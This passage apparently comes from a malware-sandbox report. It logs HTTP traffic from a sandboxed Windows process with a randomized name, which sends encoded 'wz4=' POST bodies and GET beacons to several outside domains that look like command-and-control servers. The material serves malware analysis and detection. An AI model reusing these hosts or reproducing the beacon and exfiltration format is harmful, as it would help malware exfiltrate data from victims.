                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhQRVzxcARiCQFR76qX%2FN8cdbofdEwLUmRg7fc8VBQCvK441%2FvI%2FOL79ouJLyUIrDU5HIIGn0YYpAXTkEnMgs2pjpNomBCORkK4g23UaxOE1CIFlSxWB1SNTS%2Fgr7pVmqolT9nxNaJtbbe3A"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c95414d2ede92-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                                                                              Jan 14, 2025 10:26:12.082305908 CET924INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:11 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhQRVzxcARiCQFR76qX%2FN8cdbofdEwLUmRg7fc8VBQCvK441%2FvI%2FOL79ouJLyUIrDU5HIIGn0YYpAXTkEnMgs2pjpNomBCORkK4g23UaxOE1CIFlSxWB1SNTS%2Fgr7pVmqolT9nxNaJtbbe3A"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c95414d2ede92-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.457606104.21.3.193804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:13.545166969 CET10829OUTPOST /yysf/ HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                              Referer: http://www.7wkto5nk230724z.click/yysf/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 30 2b 54 6c 2f 61 73 4e 30 73 67 77 50 4f 58 58 7a 4e 41 38 45 76 6a 6f 63 4b 47 30 35 4d 39 41 4c 6e 45 48 76 42 6a 6c 2b 32 2f 73 58 30 54 70 69 65 46 47 5a 62 43 67 71 38 74 79 6b 50 56 67 48 58 75 5a 57 74 68 48 43 34 76 47 2f 6e 51 45 6d 76 66 70 6b 7a 51 56 68 73 30 66 41 31 77 6b 57 6a 59 50 58 79 7a 46 47 56 54 76 71 77 43 43 6d 31 45 75 4e 61 50 39 39 71 42 44 6b 52 2b 35 49 72 45 6f 43 38 48 61 6e 6e 45 7a 4c 38 52 77 66 4e 49 48 35 79 4a 31 59 36 67 73 79 36 62 68 4d 62 6b 46 47 38 5a 37 48 55 44 5a 75 34 37 53 48 4e 45 76 2f 36 61 6b 35 39 42 59 54 50 79 38 61 4a 50 65 70 45 6e 37 67 67 69 64 75 4d 73 62 5a 71 72 4b 5a 61 69 4c 53 78 4d 6c 4f 36 73 6a 65 7a 6e 35 30 57 48 65 37 50 36 65 30 6b 49 56 6f 49 6f 4c 44 51 79 48 77 32 4c 57 47 38 36 55 65 48 70 48 79 34 63 4f 6f 2b 41 56 74 68 34 6e 41 34 30 56 30 44 32 49 68 43 69 52 36 36 35 45 6e 75 7a 63 61 2f 35 6b 66 43 37 70 31 59 70 4f 36 2b 48 6e 72 78 31 78 4f 56 78 70 33 69 7a 4b 4a 68 57 65 6c 77 38 46 6d 57 6c 38 38 61 [TRUNCATED]
                                                                              Data Ascii: wz4=0+Tl/asN0sgwPOXXzNA8EvjocKG05M9ALnEHvBjl+2/sX0TpieFGZbCgq8tykPVgHXuZWthHC4vG/nQEmvfpkzQVhs0fA1wkWjYPXyzFGVTvqwCCm1EuNaP99qBDkR+5IrEoC8HannEzL8RwfNIH5yJ1Y6gsy6bhMbkFG8Z7HUDZu47SHNEv/6ak59BYTPy8aJPepEn7ggiduMsbZqrKZaiLSxMlO6sjezn50WHe7P6e0kIVoIoLDQyHw2LWG86UeHpHy4cOo+AVth4nA40V0D2IhCiR665Enuzca/5kfC7p1YpO6+Hnrx1xOVxp3izKJhWelw8FmWl88a/kKNLLLRv1thVPhj3ZGa0/EMmV+0XDnQty30/wlHoMJkMqo+XEwO0KPUvSUnzXNUFyzgxLs2oGlFRATbW820wGL6fvNKKhQvAntZuPC3ckOuaz+Y/ZkzGLJHdnknottyDStSp8etRP0lhg+jcStVCdeqUSnYWRKWVpoRXQ8IKbNPG7M9/NJowDR/yJmCSYrzrOrzrwyShCODWS4W0fUWG3Pe2SZdOZctw7VKFLakuwBgz8XwkxY8bMyDRsi/oks8ELqs5sxROhWLaxSOW+euzIxftXZ7ZIV0+j+gQ0Xmx/bB8IoQ3jLe8QdvEvQH/+14vwsVt8yM8XJlz5wXOU6evSfxqZIBrNS1dKLsxVuxuC0N0B4DKixYCM+y+hUyfWJ2HOutOoOgLaR8yjDBBOvofYVnTvXLQYeWagzoPMZZNOko8DjN9STee8PBreHeWunMAdEsAVLDECiDgb86swwFtZ8uG+r+yZYlPXY4gvseH/z0Wn0y5oBmMPkl5XpCC+RzWk2r+ws0hx83vv754M84C5TPZnsDURN05fm1tFzlROPtIWOYSp3+aILasnYh/c4T/QzgofhDJ4h1KAViwo1dl2ZrIpBkRkHnNdxCRLX4iC2pa8l5OJRpME3SDrkuknOZrpLr5bYCPUdI/EG3JrnKPIUMw9bQWBgMvN [TRUNCATED]
                                                                              Jan 14, 2025 10:26:14.005810022 CET933INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:13 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbP2NoBQfclcAsHdBnv16qAEYZDiHZ188yjA%2BJczaFFo9aSzii9rYnhH2qSVZZfPYZSrjsIcgTNLb9oUkIzq%2B3%2BAC0RzvC7koCGhtCvF1t8Z2IYjInbVRQzJXHlSSuJVN%2FH9BJe8oGaz%2BKm%2F"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c955129674304-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10829&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.457607104.21.3.193804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:16.088562012 CET448OUTGET /yysf/?OvV=2njD6f80EDOLQ8&wz4=587F8uRRvdNyXp392stmA/LSb7Spi8c8LmJfnRupxm2/Wn33qNRES9K4qtAStdZkGkX6B9loQ5/VkD04mezEqEUp6fJ/QFk+OhJrfgesanG1zCyT/BctW7c= HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:26:16.567145109 CET940INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:16 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzaA1sj8tH4vEN1ikzeHVNTgk3%2BFvNQpBorj0w%2Frdj2W7%2FKHomoVCySaB5gc9KlsJ8ilVVUNucfOwUT0vE7CQcRtnv25WQrLx3rwHQGrKeBkvI3x63jbORSdYv2e%2BAdyeIkMvQJlnEoUCs9E"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c95612cfd1a30-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2024&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=448&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.4576083.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:21.613159895 CET706OUTPOST /otgv/ HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.livingslab.net
                                                                              Referer: http://www.livingslab.net/otgv/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 72 4e 4c 57 76 63 4e 46 5a 30 2f 34 68 31 47 55 31 32 4b 4d 41 34 4a 2f 49 6f 6d 6c 7a 41 32 66 44 30 70 39 4f 6f 59 63 33 51 44 62 33 4e 43 55 53 2f 2f 4f 45 50 41 6b 6c 49 42 7a 30 65 62 63 73 63 2b 2f 62 66 35 63 79 70 38 77 42 59 73 6e 43 2f 64 75 6c 74 69 2f 4a 43 74 51 4a 6e 78 66 31 70 30 57 64 45 6e 42 6a 56 7a 73 6d 50 71 43 4e 48 6d 4d 54 65 46 76 70 31 6e 35 73 34 4f 54 38 56 46 59 73 6a 77 5a 48 4f 31 51 72 32 52 30 4b 65 4e 78 69 42 72 38 76 55 77 65 72 38 79 71 72 58 41 6a 59 4f 4f 37 41 61 2b 43 58 70 42 4f 2b 61 62 58 4b 42 44 46 4e 66 70 72 4b 74 61 62 31 67 3d 3d
                                                                              Data Ascii: wz4=rNLWvcNFZ0/4h1GU12KMA4J/IomlzA2fD0p9OoYc3QDb3NCUS//OEPAklIBz0ebcsc+/bf5cyp8wBYsnC/dulti/JCtQJnxf1p0WdEnBjVzsmPqCNHmMTeFvp1n5s4OT8VFYsjwZHO1Qr2R0KeNxiBr8vUwer8yqrXAjYOO7Aa+CXpBO+abXKBDFNfprKtab1g==
                                                                              Jan 14, 2025 10:26:22.054047108 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.4576093.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:24.153810978 CET726OUTPOST /otgv/ HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.livingslab.net
                                                                              Referer: http://www.livingslab.net/otgv/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 72 4e 4c 57 76 63 4e 46 5a 30 2f 34 6e 55 57 55 35 31 69 4d 52 49 4a 2b 47 49 6d 6c 35 67 32 62 44 30 74 39 4f 71 30 79 72 79 6e 62 32 75 57 55 52 36 4c 4f 48 50 41 6b 75 6f 42 32 35 2b 62 54 73 63 69 33 62 64 74 63 79 70 6f 77 42 64 49 6e 43 6f 70 76 6b 39 6a 5a 63 79 74 57 58 58 78 66 31 70 30 57 64 43 4c 37 6a 55 62 73 6d 65 61 43 4e 6c 65 50 49 2b 46 77 71 31 6e 35 6f 34 4f 58 38 56 46 32 73 6e 78 43 48 4d 4e 51 72 79 42 30 4e 50 4e 79 33 78 72 36 67 30 78 37 6f 50 48 36 70 30 74 50 63 49 47 56 65 75 37 36 62 50 4d 55 76 72 36 41 59 42 6e 32 51 59 67 66 48 75 6e 53 75 74 79 59 51 77 6e 75 50 6e 75 6f 44 67 72 57 65 59 56 6b 56 2f 6b 3d
                                                                              Data Ascii: wz4=rNLWvcNFZ0/4nUWU51iMRIJ+GIml5g2bD0t9Oq0yrynb2uWUR6LOHPAkuoB25+bTsci3bdtcypowBdInCopvk9jZcytWXXxf1p0WdCL7jUbsmeaCNlePI+Fwq1n5o4OX8VF2snxCHMNQryB0NPNy3xr6g0x7oPH6p0tPcIGVeu76bPMUvr6AYBn2QYgfHunSutyYQwnuPnuoDgrWeYVkV/k=
                                                                              Jan 14, 2025 10:26:24.615047932 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.4576103.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:26.700403929 CET10808OUTPOST /otgv/ HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.livingslab.net
                                                                              Referer: http://www.livingslab.net/otgv/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 72 4e 4c 57 76 63 4e 46 5a 30 2f 34 6e 55 57 55 35 31 69 4d 52 49 4a 2b 47 49 6d 6c 35 67 32 62 44 30 74 39 4f 71 30 79 72 79 76 62 33 65 4b 55 54 64 6e 4f 47 50 41 6b 6a 49 42 33 35 2b 62 30 73 63 36 7a 62 64 68 32 79 71 51 77 4f 66 41 6e 54 4b 42 76 39 4e 6a 5a 44 69 74 58 4a 6e 78 4f 31 76 55 53 64 45 72 37 6a 55 62 73 6d 63 43 43 4c 33 6d 50 4b 2b 46 76 70 31 6e 31 73 34 4f 2f 38 56 64 41 73 6e 30 33 48 38 74 51 6f 53 52 30 4c 39 56 79 31 52 72 34 6e 30 78 5a 6f 50 61 67 70 31 42 31 63 49 61 2f 65 70 7a 36 52 4b 74 70 2f 36 79 33 47 69 33 33 4f 76 45 55 66 4f 58 50 33 64 47 36 58 41 76 50 54 6e 6d 45 41 77 6a 61 62 61 4d 6d 4b 50 49 4f 56 59 4f 32 4a 4d 36 68 65 71 47 6a 35 62 42 46 4f 7a 4a 58 4f 4c 65 36 49 75 6b 36 78 62 53 43 64 6b 4b 49 71 48 53 6a 36 64 61 73 6e 37 74 59 68 45 61 65 34 7a 59 61 47 52 52 69 4b 47 5a 42 4c 76 53 78 52 6c 63 41 74 65 69 53 69 44 53 73 64 6e 4f 61 33 63 38 4a 72 63 36 54 44 53 61 67 72 6c 4d 34 71 6e 4c 5a 37 6d 62 42 70 30 6f 5a 75 62 76 52 38 4f [TRUNCATED]
                                                                              Data Ascii: wz4=rNLWvcNFZ0/4nUWU51iMRIJ+GIml5g2bD0t9Oq0yryvb3eKUTdnOGPAkjIB35+b0sc6zbdh2yqQwOfAnTKBv9NjZDitXJnxO1vUSdEr7jUbsmcCCL3mPK+Fvp1n1s4O/8VdAsn03H8tQoSR0L9Vy1Rr4n0xZoPagp1B1cIa/epz6RKtp/6y3Gi33OvEUfOXP3dG6XAvPTnmEAwjabaMmKPIOVYO2JM6heqGj5bBFOzJXOLe6Iuk6xbSCdkKIqHSj6dasn7tYhEae4zYaGRRiKGZBLvSxRlcAteiSiDSsdnOa3c8Jrc6TDSagrlM4qnLZ7mbBp0oZubvR8OqQWP0M+7cwOg9c+a7+e6DjdayY0U9vqCKCJV3WKKvlNoGv+B/C0OTgDlJgrsc2SaqiOuz50zY2z1/DUGR2yPswoy/kcuKVDuqYFy7XuHli9OnJWulSIbrRfSNsJue0AYiznmD6louRyb1u8mk/I13DsmG+vNSyZR/cRzkEJpRlBrMwOqvW9nYIt03IEXVmSKVILtA8njfAr1IQGTv7aoc49uFPe6zVx+XrI4BfuqUOa4wiSc/q3hGhvKmAfGIqHGovNFHHqHYf3iruFB2VBXTeuF5F59xsyudU3XSKpr9fYLL9TUGTtEGxrA3joGpz8+KuF/tVlOZx07fvQyjhaXNt6uYSnd/fjyrWJNcq6ke3lDU0XYMGBZBq0Y4kgA++FFZ9ABuFl2oBYN7Wrd5nRlhVRrhDtVvZUz5pMsoYUhdz93h6nEc7KRNAgfinqLQmn7WH+jtq/tQCCfsTwbUJ8jw47XRaGBK0SMbWeu0H9Q/5ny9CUDwdO41Ej+YYe0QxsZhMyOr/G2cN/ua1r5JeUjiSWY+reQoWVym8tf67cTFl1ZpJ0HuxAKM//LpzwHjYkt88a8OpTUmA3Oma906IvdCxcuqo5P1UVYnqOG24uJTXHNF+iF8I56xHNQJONmX1ce0qzf19fWP+vVdgRVkQi8Vcx9WoUhxP6gsQ [TRUNCATED]
                                                                              Jan 14, 2025 10:26:27.158287048 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.4576113.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:29.244163990 CET441OUTGET /otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:26:29.699184895 CET379INHTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Tue, 14 Jan 2025 09:26:29 GMT
                                                                              content-length: 258
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 7a 34 3d 6d 50 6a 32 73 6f 45 55 45 46 6d 71 35 58 75 35 36 45 76 39 45 4e 73 2f 47 49 65 38 37 41 65 6d 4d 54 46 53 50 6f 73 47 74 7a 37 4d 2f 74 58 4e 61 64 33 41 4f 63 63 33 74 65 52 4f 32 64 72 6c 6c 2b 71 59 4f 75 4e 4a 6f 72 51 2f 48 4a 55 57 53 71 6f 59 6b 4f 2f 6c 46 68 73 4d 4f 6c 42 38 70 34 6b 54 61 42 4b 35 6e 45 50 65 39 4e 61 72 4d 55 61 76 57 64 49 3d 26 4f 76 56 3d 32 6e 6a 44 36 66 38 30 45 44 4f 4c 51 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8"}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.45761220.244.96.65804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:34.751840115 CET721OUTPOST /rdfj/ HTTP/1.1
                                                                              Host: www.quickcommerce.cloud
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.quickcommerce.cloud
                                                                              Referer: http://www.quickcommerce.cloud/rdfj/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 62 30 65 74 32 51 63 50 63 62 31 73 66 76 38 6b 75 59 2f 6e 34 4f 55 6b 55 68 4c 35 65 7a 55 78 32 33 72 56 68 69 6c 48 79 4a 45 77 49 77 31 34 69 75 65 6c 59 43 36 41 62 4d 79 31 4a 50 33 42 74 76 33 70 78 48 4e 61 34 52 46 48 78 74 42 65 70 7a 30 75 69 37 78 47 32 63 53 44 50 38 47 30 66 6d 72 47 59 59 4d 52 4a 50 68 69 6f 64 74 36 4a 41 73 70 6d 34 4e 70 73 53 69 64 35 32 2f 6b 31 54 6f 79 6b 4a 41 47 75 78 6d 4c 32 68 6c 67 4d 46 32 57 53 37 31 35 67 44 6d 6a 63 42 56 68 4c 6a 69 34 30 71 54 70 58 64 6e 78 73 68 71 35 30 68 75 59 56 58 51 53 37 31 4b 58 71 45 70 6c 6e 67 3d 3d
                                                                              Data Ascii: wz4=b0et2QcPcb1sfv8kuY/n4OUkUhL5ezUx23rVhilHyJEwIw14iuelYC6AbMy1JP3Btv3pxHNa4RFHxtBepz0ui7xG2cSDP8G0fmrGYYMRJPhiodt6JAspm4NpsSid52/k1ToykJAGuxmL2hlgMF2WS715gDmjcBVhLji40qTpXdnxshq50huYVXQS71KXqEplng==


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.45761320.244.96.65804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:37.296001911 CET741OUTPOST /rdfj/ HTTP/1.1
                                                                              Host: www.quickcommerce.cloud
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.quickcommerce.cloud
                                                                              Referer: http://www.quickcommerce.cloud/rdfj/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
